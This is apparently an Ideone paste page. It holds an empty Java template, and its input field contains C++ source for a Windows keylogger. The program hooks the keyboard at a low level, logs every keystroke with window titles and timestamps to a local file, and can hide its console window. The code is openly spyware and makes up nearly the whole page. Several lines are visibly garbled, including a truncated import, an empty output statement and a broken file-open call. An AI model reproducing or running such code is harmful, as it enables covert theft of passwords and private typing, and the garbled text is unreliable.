fork download
  1. /* package whatever; // don't place package name! */
  3. import java.util.*;
  4. import java.lang.*;
  5. import*;
  7. /* Name of the class has to be "Main" only if the class is public. */
  8. class Ideone
  9. {
  10. public static void main (String[] args) throws java.lang.Exception
  11. {
  12. // your code goes here
  13. }
  14. }
Success #stdin #stdout 0.1s 52572KB
#define UNICODE #include <Windows.h> #include <cstring> #include <cstdio> #include <fstream> #include <iostream> #include <sstream> #include <time.h> #include <map>  // defines whether the window is visible or not // should be solved with makefile, not in this file #define visible // (visible / invisible) // Defines whether you want to enable or disable  // boot time waiting if running at system boot. #define bootwait // (bootwait / nowait) // defines which format to use for logging // 0 for default, 10 for dec codes, 16 for hex codex #define FORMAT 0 // defines if ignore mouseclicks #define mouseignore // variable to store the HANDLE to the hook. Don't declare it anywhere else then globally // or you will get problems since every function uses this variable.  #if FORMAT == 0 const std::map<int, std::string> keyname{  	{VK_BACK, "[BACKSPACE]" }, 	{VK_RETURN,	"\n" }, 	{VK_SPACE,	"_" }, 	{VK_TAB,	"[TAB]" }, 	{VK_SHIFT,	"[SHIFT]" }, 	{VK_LSHIFT,	"[LSHIFT]" }, 	{VK_RSHIFT,	"[RSHIFT]" }, 	{VK_CONTROL,	"[CONTROL]" }, 	{VK_LCONTROL,	"[LCONTROL]" }, 	{VK_RCONTROL,	"[RCONTROL]" }, 	{VK_MENU,	"[ALT]" }, 	{VK_LWIN,	"[LWIN]" }, 	{VK_RWIN,	"[RWIN]" }, 	{VK_ESCAPE,	"[ESCAPE]" }, 	{VK_END,	"[END]" }, 	{VK_HOME,	"[HOME]" }, 	{VK_LEFT,	"[LEFT]" }, 	{VK_RIGHT,	"[RIGHT]" }, 	{VK_UP,		"[UP]" }, 	{VK_DOWN,	"[DOWN]" }, 	{VK_PRIOR,	"[PG_UP]" }, 	{VK_NEXT,	"[PG_DOWN]" }, 	{VK_OEM_PERIOD,	"." }, 	{VK_DECIMAL,	"." }, 	{VK_OEM_PLUS,	"+" }, 	{VK_OEM_MINUS,	"-" }, 	{VK_ADD,		"+" }, 	{VK_SUBTRACT,	"-" }, 	{VK_CAPITAL,	"[CAPSLOCK]" }, }; #endif HHOOK _hook;  // This struct contains the data received by the hook callback. As you see in the callback function // it contains the thing you will need: vkCode = virtual key code. KBDLLHOOKSTRUCT kbdStruct;  int Save(int key_stroke); std::ofstream output_file;  // This is the callback function. Consider it the event that is raised when, in this case, // a key is pressed. LRESULT __stdcall HookCallback(int nCode, WPARAM wParam, LPARAM lParam) { 	if (nCode >= 0) 	{ 		// the action is valid: HC_ACTION. 		if (wParam == WM_KEYDOWN) 		{ 			// lParam is the pointer to the struct containing the data needed, so cast and assign it to kdbStruct. 			kbdStruct = *((KBDLLHOOKSTRUCT*)lParam);  			// save to file 			Save(kbdStruct.vkCode); 		} 	}  	// call the next hook in the hook chain. This is nessecary or your hook chain will break and the hook stops 	return CallNextHookEx(_hook, nCode, wParam, lParam); }  void SetHook() { 	// Set the hook and set it to use the callback function above 	// WH_KEYBOARD_LL means it will set a low level keyboard hook. More information about it at MSDN. 	// The last 2 parameters are NULL, 0 because the callback function is in the same thread and window as the 	// function that sets and releases the hook. 	if (!(_hook = SetWindowsHookEx(WH_KEYBOARD_LL, HookCallback, NULL, 0))) 	{ 		LPCWSTR a = L"Failed to install hook!"; 		LPCWSTR b = L"Error"; 		MessageBox(NULL, a, b, MB_ICONERROR); 	} }  void ReleaseHook() { 	UnhookWindowsHookEx(_hook); }   int Save(int key_stroke) { 	std::stringstream output; 	static char lastwindow[256] = ""; #ifndef mouseignore  	if ((key_stroke == 1) || (key_stroke == 2)) 	{ 		return 0; // ignore mouse clicks 	} #endif 	HWND foreground = GetForegroundWindow(); 	DWORD threadID; 	HKL layout = NULL;  	if (foreground) 	{ 		// get keyboard layout of the thread 		threadID = GetWindowThreadProcessId(foreground, NULL); 		layout = GetKeyboardLayout(threadID); 	}  	if (foreground) 	{ 		char window_title[256]; 		GetWindowTextA(foreground, (LPSTR)window_title, 256);  		if (strcmp(window_title, lastwindow) != 0) 		{ 		    strcpy_s(lastwindow, sizeof(lastwindow), window_title); 		    // get time 		    struct tm tm_info; 		    time_t t = time(NULL); 		    localtime_s(&tm_info, &t); 		    char s[64]; 		    strftime(s, sizeof(s), "%FT%X%z", &tm_info);  			output << "\n\n[Window: " << window_title << " - at " << s << "] "; 		} 	}  #if FORMAT == 10 	output << '[' << key_stroke << ']'; #elif FORMAT == 16 	output << std::hex << "[" << key_stroke << ']'; #else 	if (keyname.find(key_stroke) != keyname.end()) 	{ 		output <<; 	} 	else 	{ 		char key; 		// check caps lock 		bool lowercase = ((GetKeyState(VK_CAPITAL) & 0x0001) != 0);  		// check shift key 		if ((GetKeyState(VK_SHIFT) & 0x1000) != 0 || (GetKeyState(VK_LSHIFT) & 0x1000) != 0 			|| (GetKeyState(VK_RSHIFT) & 0x1000) != 0) 		{ 			lowercase = !lowercase; 		}  		// map virtual key according to keyboard layout 		key = MapVirtualKeyExA(key_stroke, MAPVK_VK_TO_CHAR, layout);  		// tolower converts it to lowercase properly 		if (!lowercase) 		{ 			key = tolower(key); 		} 		output << char(key); 	} #endif 	// instead of opening and closing file handlers every time, keep file open and flush. 	output_file << output.str(); 	output_file.flush();  	std::cout << output.str();  	return 0; } void Stealth() { #ifdef visible 	ShowWindow(FindWindowA("ConsoleWindowClass", NULL), 1); // visible window #endif  #ifdef invisible 	ShowWindow(FindWindowA("ConsoleWindowClass", NULL), 0); // invisible window 	FreeConsole(); // Detaches the process from the console window. This effectively hides the console window and fixes the broken invisible define. #endif }  // Function to check if the system is still booting up bool IsSystemBooting()  { 	return GetSystemMetrics(SM_SYSTEMDOCKED) != 0; }  int main() { 	// Call the visibility of window function. 	Stealth();  	 	// Check if the system is still booting up 	#ifdef bootwait // If defined at the top of this file, wait for boot metrics. 	while (IsSystemBooting())  	{ 		std::cout << "System is still booting up. Waiting 10 seconds to check again...\n"; 		Sleep(10000); // Wait for 10 seconds before checking again 	} 	#endif 	#ifdef nowait // If defined at the top of this file, do not wait for boot metrics. 		std::cout << "Skipping boot metrics check.\n"; 	#endif 	// This part of the program is reached once the system has  	// finished booting up aka when the while loop is broken  	// with the correct returned value. 	 	// Open the output file in append mode. 	// Feel free to rename this output file.  	const char* output_filename = "keylogger.log"; 	std::cout << "Logging output to " << output_filename << std::endl;, std::ios_base::app);  	// Call the hook function and set the hook. 	SetHook();  	// We need a loop to keep the console application running. 	MSG msg; 	while (GetMessage(&msg, NULL, 0, 0)) 	{ 	} }
Standard output is empty